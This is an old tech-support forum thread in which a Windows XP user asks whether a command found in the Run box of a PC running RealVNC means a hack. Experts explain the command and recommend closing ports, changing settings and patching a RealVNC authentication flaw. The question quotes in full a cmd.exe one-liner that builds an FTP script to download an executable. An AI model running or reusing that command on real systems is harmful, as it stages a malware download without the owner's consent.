Solved

Have I been hacked ?

Posted on 2006-11-02
6
1,349 Views
Last Modified: 2013-12-04
When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e

What does the above mean please ?
0
Comment
Question by:EugeneGardner
  • 3
  • 2
6 Comments
 
LVL 9

Accepted Solution

by:
FixingStuff earned 40 total points
ID: 17863044
Looks like there was a hack attempt. the command does the following:
Creates a file called i with the following contents:
open 127.0.0.1 31006
user 1 1
get e_53.exe
quit

Then it trys to run FTP using the above file as a script.

You are either wide open on the internet.... no firewall, or have port forwarding to VNC, which will get port scanned constantly.
Recommendation LOCK DOWN YOUR MACHINE ASAP.  At least change the default port on VNC.

Go here and run SheildsUP to check your open ports to the world.
www.grc.com

FS-
0
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17865217
Thanks.  GRC thinks I am secure (as I am behind a firewall).  My port 31006 is in 'stealth' mode.
I'm not sure how the Run... command was caused to be issued as my Real VNS connection is password protected.  And where would the e_53.exe file be dropped ?  I can't find it anywhere.  Another thing I don't understand is what would the point of running a script like that be ?  There is no execute command !
0
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17868447
Good that you are secure!
You probably should go back to GRC sheildsup and check port 5900.  Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
0
Migrating Your Company's PCs

To keep pace with competitors, businesses must keep employees productive, and that means providing them with the latest technology. This document provides the tips and tricks you need to help you migrate an outdated PC fleet to new desktops, laptops, and tablets.

 
LVL 21

Assisted Solution

by:briancassin
briancassin earned 20 total points
ID: 17871591
this issue seems to be directly related to Real VNC

 how old is it ?

because their was a serious security flaw found back around May of this year if you have not updated it, it may be that attackers are getting into your system because you are running an unpatched version of VNC.

Source: eWeek

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions. The RealVNC software, which competes with Symantec's pcAnywhere, allows users access a remote computer from a local PC. The company distributes the software in three versions—free, personal and enterprise edition. The vulnerability is caused due to an error within the handling of VNC password authentication requests. It can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.
0
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17872691
Ahh - good point.  I'm running version 4.1.1   I have just downloaded version 4.1.2
Thanks.
0
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17874034
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-
0

Featured Post

Ransomware-A Revenue Bonanza for Service Providers

Ransomware – malware that gets on your customers’ computers, encrypts their data, and extorts a hefty ransom for the decryption keys – is a surging new threat.  The purpose of this eBook is to educate the reader about ransomware attacks.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Many people tend to confuse the function of a virus with the one of adware, this misunderstanding of the basic of what each software is and how it operates causes users and organizations to take the wrong security measures that would protect them ag…
OfficeMate Freezes on login or does not load after login credentials are input.
A short tutorial showing how to set up an email signature in Outlook on the Web (previously known as OWA). For free email signatures designs, visit https://www.mail-signatures.com/articles/signature-templates/?sts=6651 If you want to manage em…
In an interesting question (https://www.experts-exchange.com/questions/29008360/) here at Experts Exchange, a member asked how to split a single image into multiple images. The primary usage for this is to place many photographs on a flatbed scanner…

839 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question